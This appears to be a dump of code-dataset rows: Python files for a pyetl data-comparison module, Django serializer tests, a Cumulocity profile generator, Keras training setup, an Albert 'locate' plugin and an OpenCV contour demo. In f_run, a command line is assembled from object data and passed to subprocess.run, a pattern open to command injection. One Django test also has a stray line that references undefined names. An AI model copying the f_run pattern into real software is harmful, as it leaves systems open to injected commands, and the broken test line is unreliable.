        regle.stock_param.moteur.traite_objet(obj, regle.branchements.brch["supp:"])
    # Reset the comparison state for the next batch.
    regle.comp = None
    regle.nbstock = 0
#def compare_traite_stock(regle):
# """ sort les objets detruits"""
# for clef, obj in regle.comp.items():
# if obj.redirect is None:
# obj.attributs[regle.params.att_sortie.val]='supp'
# regle.stock_param.moteur.traite_objet(obj, regle.branchements.brch["supp:"])
# regle.comp[clef] = None
# regle.comp = None
# regle.nbstock = 0
def h_compare(regle):
    """Initialise a compare-to-reference rule: declare its extra exits
    (new/supp/diff/orig) and reset the comparison state."""
    for exit_name in ('new:', 'supp:', 'diff:', 'orig:'):
        regle.branchements.addsortie(exit_name)
    regle.store = True
    regle.nbstock = 0
    regle.comp = None
    regle.precedent = None
    # Hook called at end-of-stream to flush unmatched reference objects.
    regle.traite_stock = compare_traite_stock
def f_compare2(regle, obj):
    '''#aide||compare a un element precharge
    #aide_spec||parametres clef;fichier;attribut;preload;macro;nom
    #aide_spec2||sort en si si egal en sinon si different
    #aide_spec3||si les elements entre [] sont pris dans l objet courant
    #pattern||A;;?L;compare2;A;C
    #helper||compare
    #schema||ajout_attribut
    #!test||
    '''
    # NOTE: the docstring above is machine-parsed by the pyetl framework
    # and must not be altered.
    # Identity changed: (re)load the reference set for the new class.
    if regle.precedent != obj.ident:
        comp = regle.stock_param.store[regle.params.cmp2.val]
        # A different reference set replaces the previous one: flush the
        # old one first (unmatched entries go out as 'supp').
        if regle.comp and comp is not regle.comp:
            compare_traite_stock(regle)
        regle.nbstock = 1
        regle.comp = comp
        if regle.comp:
            # Precompute, per reference entry, the list of attribute values
            # used for the comparison (either the configured attribute list
            # or every non-'#' attribute in sorted order).
            # NOTE(review): comp2 is keyed by the iteration items of
            # regle.comp but looked up below with the string ``clef`` —
            # confirm the store layout makes these the same keys.
            if regle.params.att_entree.liste:
                regle.comp2 = {i:([i.attributs[j] for j in
                                   regle.params.att_entree.liste]) for i in regle.comp}
            else:
                regle.comp2 = {i:([i.attributs[j] for j in
                                   sorted([k for k in i.attributs if k[0] != "#"])])
                               for i in regle.comp}
#        print ('comparaison ', len(regle.comp), regle.comp)
    try:
        # Build the lookup key: either a joined multi-attribute key or a
        # single attribute value.
        if len(regle.params.cmp1.liste) > 1:
            clef = "|".join(obj.attributs.get(i, '') for i in regle.params.att_entree.liste)
        else:
            clef = obj.attributs[regle.params.cmp1.val]
        ref = regle.comp2[clef]
        # NOTE(review): regle.ref is not initialised in h_compare — confirm
        # it is created elsewhere before this rule runs.
        regle.ref.add(clef)
    except KeyError:
        # No reference entry with that key: the object is new.
        obj.redirect = "new:"
        obj.attributs[regle.params.att_sortie.val] = 'new'
        return False
    if regle.params.att_entree.liste:
        # Compare only the configured attributes.
        compare = all([obj.attributs[i] == ref.attributs[i]
                       for i in regle.params.att_entree.liste])
    else:
        # Compare all non-'#' attributes (same key set, same values) plus
        # the geometry.
        atts = {i for i in obj.attributs if i[0] != "#"}
        kref = {i for i in ref.attributs if i[0] != "#"}
        # id_att = atts == kref
        compare = atts == kref and all([obj.attributs[i] == ref.attributs[i]
                                        for i in atts]) and obj.geom == ref.geom
    if compare:
        return True
    # Different: tag both versions and re-inject the original on "orig:".
    obj.redirect = "diff:"
    obj.attributs[regle.params.att_sortie.val] = 'diff'
    ref.attributs[regle.params.att_sortie.val] = 'orig'
    regle.stock_param.moteur.traite_objet(ref, regle.branchements.brch["orig:"])
    # put the original back into the processing circuit
    return False
def f_compare(regle, obj):
    '''#aide||compare a un element precharge
    #aide_spec||parametres clef;fichier;attribut;preload;macro;nom
    #aide_spec2||sort en si si egal en sinon si different
    #aide_spec3||si les elements entre [] sont pris dans l objet courant
    #pattern||A;;?L;compare;A;C
    #schema||ajout_attribut
    #!test||
    '''
    # NOTE: the docstring above is machine-parsed by the pyetl framework
    # and must not be altered.
    if regle.precedent != obj.ident:  # we just switched to another class
        # Flush unmatched references from the previous class as 'supp'.
        if regle.comp:
            compare_traite_stock(regle)
        regle.nbstock = 1
        regle.comp = regle.stock_param.store[regle.params.cmp2.val]
        regle.precedent = obj.ident
#        print ('comparaison ', len(regle.comp), regle.comp)
    if regle.comp is None:
        # Nothing was preloaded for this key: cannot compare.
        return False
    try:
        # Build the lookup key and *remove* the matched reference so that
        # whatever remains in regle.comp at the end counts as deleted.
        if len(regle.params.cmp1.liste) > 1:
            clef = "|".join(obj.attributs.get(i, '')
                            for i in regle.params.att_entree.liste)
        else:
            clef = obj.attributs[regle.params.cmp1.val]
        ref = regle.comp.pop(clef)
    except KeyError:
        # No reference entry with that key: the object is new.
        obj.redirect = "new:"
        obj.attributs[regle.params.att_sortie.val] = 'new'
        return False
    if regle.params.att_entree.liste:
        # Compare only the configured attributes.
        compare = all([obj.attributs[i] == ref.attributs[i]
                       for i in regle.params.att_entree.liste])
    else:
        # Compare all non-'#' attributes (same key set, same values) plus
        # the geometry.
        atts = {i for i in obj.attributs if i[0] != "#"}
        kref = {i for i in ref.attributs if i[0] != "#"}
        # id_att = atts == kref
        compare = atts == kref and all([obj.attributs[i] == ref.attributs[i]
                                        for i in atts]) and obj.geom == ref.geom
    if compare:
        return True
    # Different: tag both versions and re-inject the original on "orig:".
    obj.redirect = "diff:"
    obj.attributs[regle.params.att_sortie.val] = 'diff'
    ref.attributs[regle.params.att_sortie.val] = 'orig'
    ref.setident(obj.ident)  # force the original onto the current identity
    regle.stock_param.moteur.traite_objet(ref, regle.branchements.brch["orig:"])
    # put the original back into the processing circuit
    return False
def f_run(regle, obj):
    '''#aide||execute un programme exterieur
    #aide_spec||attribut qui recupere le resultat, parametres , run , nom, parametres
    #pattern||?A;?C;?A;run;C;?C
    #schema||ajout_attribut
    '''
    # NOTE: the docstring above is machine-parsed by the pyetl framework
    # and must not be altered.
    # Build the command line from rule parameters plus a value taken from
    # the current object (falling back to the rule's literal value).
    # NOTE(review): the command is assembled from object attributes —
    # injection risk if that data is untrusted; confirm the input source.
    chaine = ' '.join((regle.params.cmp1.val, regle.params.cmp2.val,
                       obj.attributs.get(regle.params.att_entree.val, regle.params.val_entree.val)))
    # NOTE(review): passing a single string without shell=True only works on
    # Windows; on POSIX the whole string is taken as the program name —
    # confirm the intended platform.
    fini = subprocess.run(chaine, stderr=subprocess.STDOUT)
    if regle.params.att_sortie.val:
        # Stores the repr of the CompletedProcess (command + return code),
        # not the program's output.
        obj.attributs[regle.params.att_sortie.val] = str(fini)
| klix2/mapper0_8 | pyetl/moteur/fonctions/traitement_divers.py | traitement_divers.py | py | 26,649 | python | fr | code | 0 | github-code | 36 |
35658691918 | """The filtersets tests module."""
import pytest
from django.db.models.query import QuerySet
from django.http import HttpRequest
from communication.serializer_fields import (ParentMessageForeignKey,
UserReviewForeignKey)
from conftest import OBJECTS_TO_CREATE
pytestmark = pytest.mark.django_db
def test_user_review_foreign_key(reviews: QuerySet):
    """The field queryset should contain only the request user's reviews."""
    owner = reviews[0].professional.user
    fake_request = HttpRequest()
    fake_request.user = owner
    field = UserReviewForeignKey()
    field._context = {"request": fake_request}  # pylint: disable=protected-access
    queryset = field.get_queryset()
    assert reviews.count() == 2
    assert queryset.count() == 1
    assert queryset.first().professional.user == owner
assert result.first().professional.user == user
def test_parent_message_foreign_key(messages: QuerySet):
    """The field queryset should contain only messages sent to the request user."""
    recipient = messages[0].sender
    fake_request = HttpRequest()
    fake_request.user = recipient
    field = ParentMessageForeignKey()
    field._context = {"request": fake_request}  # pylint: disable=protected-access
    queryset = field.get_queryset()
    assert messages.count() == OBJECTS_TO_CREATE * 4
    assert queryset.count() == OBJECTS_TO_CREATE
    assert queryset.first().recipient == recipient
| webmalc/d8base-backend | communication/tests/serializer_fields_tests.py | serializer_fields_tests.py | py | 1,305 | python | en | code | 0 | github-code | 36 |
3314005552 | import time, json, os, logging, requests
from cumulocityAPI import C8Y_BASEURL, C8Y_TENANT, C8Y_HEADERS, CumulocityAPI
from arguments_handler import get_profile_generator_mode
from oeeAPI import OeeAPI
def try_int(value):
    """Convert *value* to an int, returning None when conversion fails.

    Used below to read optional integer environment variables, where the
    value may be absent (None) or malformed.

    Parameters
    ----------
    value : Any
        Candidate value, typically a string from os.environ or None.

    Returns
    -------
    int or None
        The converted integer, or None when conversion is impossible.
    """
    try:
        return int(value)
    except (TypeError, ValueError):
        # Only conversion failures are expected here; anything else
        # (e.g. KeyboardInterrupt) should propagate, unlike the previous
        # bare `except` which swallowed everything.
        return None
# Optional integer configuration via environment variables; note that a
# value of "0" falls back to the default because of the `or`.
PROFILES_PER_DEVICE = try_int(os.environ.get('PROFILES_PER_DEVICE')) or 1
SLEEP_TIME_FOR_PROFILE_CREATION_LOOP = try_int(os.environ.get('SLEEP_TIME_FOR_PROFILE_CREATION_LOOP')) or 60 * 12
# Operating mode selected from the command line (see arguments_handler).
MODE = get_profile_generator_mode()
# JSON-PYTHON mapping, to get json.load() working
null = None
false = False
true = True
######################
logging.basicConfig(format='%(asctime)s %(name)s:%(message)s', level=logging.INFO)
log = logging.getLogger("profile-generator")
log.info("using C8Y backend:" + C8Y_BASEURL)
log.info("using C8Y tenant:" + C8Y_TENANT)
# API clients shared by every mode below.
c8y_api = CumulocityAPI()
oee_api = OeeAPI()
def delete_profiles():
    """Delete every OEE calculation profile attached to the known simulators.

    For each simulator device, fetches its managed object from the
    Cumulocity inventory API, walks its child devices and deletes those
    whose type is the OEE calculation-profile type. Logs the total count.
    """
    simulator_ids = oee_api.get_simulator_ids()
    deleted_profiles = 0
    for simulator_id in simulator_ids:
        log.info(f'deleting profiles for {simulator_id}')
        response = requests.get(f'{C8Y_BASEURL}/inventory/managedObjects/{simulator_id}', headers=C8Y_HEADERS)
        if response.ok:
            child_devices = response.json()['childDevices']['references']
            for child_device in child_devices:
                child_device_id = child_device['managedObject']['id']
                child_device_json = c8y_api.get_managed_object(child_device_id)
                # Only remove children that are OEE calculation profiles;
                # other child devices are left untouched.
                if child_device_json['type'] == c8y_api.OEE_CALCULATION_PROFILE_TYPE:
                    log.info(f'deleting managed object {child_device_id}')
                    # delete_managed_object apparently returns a count (0/1)
                    deleted_profiles = deleted_profiles + c8y_api.delete_managed_object(child_device_id)
        else:
            log.warning(f'Couldn\'t find the managed object. response: {response}, content: {response.text}')
    log.info(f'profiles deleted: {deleted_profiles}')
# Mode: create PROFILES_PER_DEVICE profiles per simulator, pausing every
# 200 profiles so the calculation backend can be observed under load.
if MODE == 'createProfiles':
    log.info('===============================')
    log.info('starting to create profiles ...')
    log.info(f'existing profiles: {c8y_api.count_all_profiles()}')
    counter = 0
    for _ in range(PROFILES_PER_DEVICE):
        for external_id in oee_api.get_simulator_external_ids():
            profile = oee_api.create_and_activate_profile(external_id)
            counter = counter + 1
            if counter % 200 == 0:
                log.info(f'profiles: {c8y_api.count_all_profiles()}. Wait for {SLEEP_TIME_FOR_PROFILE_CREATION_LOOP} minutes')
                # sleep for some time to be able to verify if calculation is still working with the given number of profiles
                time.sleep(SLEEP_TIME_FOR_PROFILE_CREATION_LOOP)
    log.info(f'profiles after execution: {c8y_api.count_all_profiles()}')
# Mode: remove all simulator profiles through the OEE API.
if MODE == 'removeSimulatorProfilesViaOee':
    log.info('===============================================')
    log.info('starting to remove all simulator profiles via OEE API ...')
    log.info(f'existing profiles: {c8y_api.count_all_profiles()}')
    oee_api.delete_all_simulators_profiles()
    log.info(f'profiles after execution: {c8y_api.count_all_profiles()}')
# Mode: delete profile managed objects directly via the inventory API.
if MODE == 'deleteSimulatorProfiles':
    log.info('===================================')
    log.info('starting to delete all simulator profiles ...')
    log.info(f'existing profiles: {c8y_api.count_all_profiles()}')
    delete_profiles()
    log.info(f'profiles after execution: {c8y_api.count_all_profiles()}')
# Mode: delete every calculation-category managed object.
if MODE == 'deleteCalculationCategories':
    log.info('===================================')
    log.info('starting to delete all calculation categories ...')
    log.info(
        f'existing category managed objects: {c8y_api.count_all_categories()}')
    deleted_categories = 0
    for category in c8y_api.get_calculation_categories():
        deleted_categories += c8y_api.delete_managed_object(category['id'])
    log.info(f'Managed_objects deleted: {deleted_categories}')
# Mode: create or update the calculation-category managed object from
# the local categories.json file.
if MODE == 'createCalculationCategories':
    log.info('===================================')
    log.info('starting to create calculation categories ...')
    with open('./categories.json', 'r') as f:
        categories = f.read()
    if (c8y_api.count_all_categories()) == 0:
        log.info('Create category managed object')
        c8y_api.create_managed_object(categories)
    elif (c8y_api.count_all_categories()) == 1:
        log.info('Update category managed object')
        # Merge local and remote categories, deduplicating by category id
        # (local definitions are overridden by remote ones with same id).
        categories_by_id = {}
        for c in json.loads(categories)['categories'] + c8y_api.get_calculation_categories()[0]['categories']:
            categories_by_id[c['id']] = c
        mo_id = c8y_api.get_calculation_categories()[0]['id']
        fragment = {
            'categories': list(categories_by_id.values())
        }
        c8y_api.update_managed_object(mo_id, json.dumps(fragment))
    else:
        log.warning('More than 1 category managed object! Unable to update managed object')
    log.info('==========Categories created==========')
| SoftwareAG/oee-simulators | simulators/main/profile_generator.py | profile_generator.py | py | 5,006 | python | en | code | 8 | github-code | 36 |
42356364206 | import os
import tensorflow as tf
from tensorflow.keras.callbacks import EarlyStopping
from utils.callbacks import ModelCheckpoint, TimeHistory
from engine.metrics import (jaccard_index, jaccard_index_softmax, IoU_instances,
instance_segmentation_loss, weighted_bce_dice_loss)
def prepare_optimizer(cfg, model):
    """Select the optimizer, loss and metrics for the given model.

    Parameters
    ----------
    cfg : YACS CN object
        Configuration.

    model : Keras model
        Model to be compiled with the selected options.

    Raises
    ------
    ValueError
        For configuration combinations that are not implemented.
    """
    assert cfg.TRAIN.OPTIMIZER in ['SGD', 'ADAM']
    assert cfg.LOSS.TYPE in ['CE', 'W_CE_DICE']

    # Select the optimizer
    # NOTE(review): the `lr` keyword is the legacy spelling (newer TF/Keras
    # uses `learning_rate`) — confirm against the pinned TF version.
    if cfg.TRAIN.OPTIMIZER == "SGD":
        opt = tf.keras.optimizers.SGD(lr=cfg.TRAIN.LR, momentum=0.99, decay=0.0, nesterov=False)
    elif cfg.TRAIN.OPTIMIZER == "ADAM":
        opt = tf.keras.optimizers.Adam(lr=cfg.TRAIN.LR, beta_1=0.9, beta_2=0.999, epsilon=None, decay=0.0, amsgrad=False)

    # Compile the model: the loss/metric pair depends on the problem type,
    # the loss type, the number of classes and (for instances) the channels.
    if cfg.PROBLEM.TYPE == "CLASSIFICATION":
        model.compile(optimizer=opt, loss='categorical_crossentropy', metrics=["accuracy"])
    elif cfg.LOSS.TYPE == "CE" and cfg.PROBLEM.TYPE == "SEMANTIC_SEG":
        if cfg.MODEL.N_CLASSES > 1:
            model.compile(optimizer=opt, loss='categorical_crossentropy', metrics=[jaccard_index_softmax])
        else:
            model.compile(optimizer=opt, loss='binary_crossentropy', metrics=[jaccard_index])
    elif cfg.LOSS.TYPE == "CE" and cfg.PROBLEM.TYPE == "INSTANCE_SEG":
        if cfg.MODEL.N_CLASSES > 1:
            raise ValueError("Not implemented pipeline option: N_CLASSES > 1 and INSTANCE_SEG")
        else:
            if cfg.DATA.CHANNELS in ["BC", "BCM"]:
                # Binary/contour(/mask) channels: plain binary CE + IoU.
                model.compile(optimizer=opt, loss='binary_crossentropy', metrics=[jaccard_index])
            else:
                if cfg.DATA.CHANNELS == "Dv2":
                    # Distance-only channels: regression loss, MSE metric.
                    model.compile(optimizer=opt, loss=instance_segmentation_loss(cfg.DATA.CHANNEL_WEIGHTS, cfg.DATA.CHANNELS),
                                  metrics=["mse"])
                else:
                    # Mixed binary+distance channels: IoU computed only on
                    # the binary channels (2 for BCD/BCDv2, otherwise 1).
                    bin_channels = 2 if cfg.DATA.CHANNELS in ["BCD", "BCDv2"] else 1
                    model.compile(optimizer=opt, loss=instance_segmentation_loss(cfg.DATA.CHANNEL_WEIGHTS, cfg.DATA.CHANNELS),
                                  metrics=[IoU_instances(binary_channels=bin_channels)])
    elif cfg.LOSS.TYPE == "W_CE_DICE" and cfg.PROBLEM.TYPE == "SEMANTIC_SEG":
        model.compile(optimizer=opt, loss=weighted_bce_dice_loss(w_dice=0.66, w_bce=0.33), metrics=[jaccard_index])
    elif cfg.LOSS.TYPE == "W_CE_DICE" and cfg.PROBLEM.TYPE == "INSTANCE_SEG":
        raise ValueError("Not implemented pipeline option: LOSS.TYPE == W_CE_DICE and INSTANCE_SEG")
def build_callbacks(cfg):
    """Assemble the Keras callbacks used during training.

    Parameters
    ----------
    cfg : YACS CN object
        Configuration.

    Returns
    -------
    callbacks : List of callbacks
        All callbacks to be applied to a model.
    """
    # The checkpoint file lives in this directory, so make sure it exists.
    os.makedirs(cfg.PATHS.CHECKPOINT, exist_ok=True)

    return [
        # Measure the time taken by each epoch
        TimeHistory(),
        # Stop early and restore the best model weights when training ends
        EarlyStopping(patience=cfg.TRAIN.PATIENCE, verbose=1, restore_best_weights=True),
        # Save the best model into an h5 file in case the learned weights
        # are needed again later
        ModelCheckpoint(cfg.PATHS.CHECKPOINT_FILE, verbose=1, save_best_only=True),
    ]
| lijunRNA/EM_Image_Segmentation | engine/__init__.py | __init__.py | py | 3,725 | python | en | code | null | github-code | 36 |
5986988615 | from albert import *
import os
import pathlib
import shlex
import subprocess
md_iid = '1.0'
md_version = "1.8"
md_name = "Locate"
md_description = "Find and open files using locate"
md_license = "BSD-3"
md_url = "https://github.com/albertlauncher/python/tree/master/locate"
md_bin_dependencies = "locate"
class Plugin(TriggerQueryHandler):
    """Albert launcher plugin: find and open files via the `locate` command."""

    def id(self):
        # NOTE(review): md_id is not defined in this file — presumably
        # injected into the module by the albert plugin loader; confirm.
        return md_id

    def name(self):
        return md_name

    def description(self):
        return md_description

    def defaultTrigger(self):
        # Query prefix that activates this handler.
        return "'"

    def synopsis(self):
        return "<locate params>"

    def initialize(self):
        # Icon candidates, tried in order; the bundled SVG is the fallback.
        self.icons = [
            "xdg:preferences-system-search",
            "xdg:system-search",
            "xdg:search",
            "xdg:text-x-generic",
            str(pathlib.Path(__file__).parent / "locate.svg")
        ]

    def handleTriggerQuery(self, query):
        # Only search once the user typed at least three characters.
        if len(query.string) > 2:
            try:
                # Shell-style splitting so quoted arguments reach locate intact.
                args = shlex.split(query.string)
            except ValueError:
                # Unbalanced quotes while the user is still typing — ignore.
                return

            result = subprocess.run(['locate', *args], stdout=subprocess.PIPE, text=True)
            # The query may have been cancelled while locate was running.
            if not query.isValid:
                return

            lines = sorted(result.stdout.splitlines(), reverse=True)
            if not query.isValid:
                return

            for path in lines:
                basename = os.path.basename(path)
                query.add(
                    Item(
                        id=path,
                        text=basename,
                        subtext=path,
                        icon=self.icons,
                        actions=[
                            # Bind path as a default argument so each lambda
                            # keeps its own path (avoids late-binding capture).
                            Action("open", "Open", lambda p=path: openUrl("file://%s" % p))
                        ]
                    )
                )
        else:
            # Too few characters: offer to refresh the locate database instead.
            query.add(
                Item(
                    id="updatedb",
                    text="Update locate database",
                    subtext="Type at least three chars for a search",
                    icon=self.icons,
                    actions=[
                        Action("update", "Update", lambda: runTerminal("sudo updatedb"))
                    ]
                )
            )
| m0lw9re/albert | plugins/python/plugins/locate/__init__.py | __init__.py | py | 2,227 | python | en | code | 0 | github-code | 36 |
23400353850 | import cv2
import numpy as np
from matplotlib import pyplot as plt
import os
# NOTE(review): hard-coded absolute path — this script only runs from the
# author's machine as-is; consider deriving the path from __file__.
os.chdir('C:\\Users\\sachi\\.vscode\\GitHubRepos\\OSCV_Exercises')

exetasknum = 1

# Contours: curves joining all continuous points along a boundary having the
# same color or intensity — useful for shape analysis and object detection.
# For better accuracy, find contours on a binary image (threshold or Canny
# first). findContours expects white objects on a black background and, in
# OpenCV 3, modifies the source image — hence the .copy() below.
if exetasknum == 1:
    im = cv2.imread('test.jpg')
    imgray = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)
    ret, thresh = cv2.threshold(imgray, 127, 255, 0)
    # Bug fix: the original called findContours unconditionally before the
    # version check (which crashes on OpenCV 3, where it returns 3 values)
    # and then passed the 3-channel BGR image instead of the binary image
    # in the OpenCV-3 branch. Contours must be found on `thresh`.
    major = cv2.__version__.split('.')[0]
    if major == '3':
        # OpenCV 3 returns (image, contours, hierarchy) and mutates its input.
        ret, contours, hierarchy = cv2.findContours(thresh.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
    else:
        # OpenCV 2 and 4+ return (contours, hierarchy).
        contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
    # Draw every contour (-1) in green with thickness 3 on the original image.
    img = cv2.drawContours(im, contours, -1, (0, 255, 0), 3)
    while True:
        cv2.imshow('img', img)
        k = cv2.waitKey(1) & 0xFF
        if k == 27:  # ESC closes the window
            break
    cv2.destroyAllWindows()
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.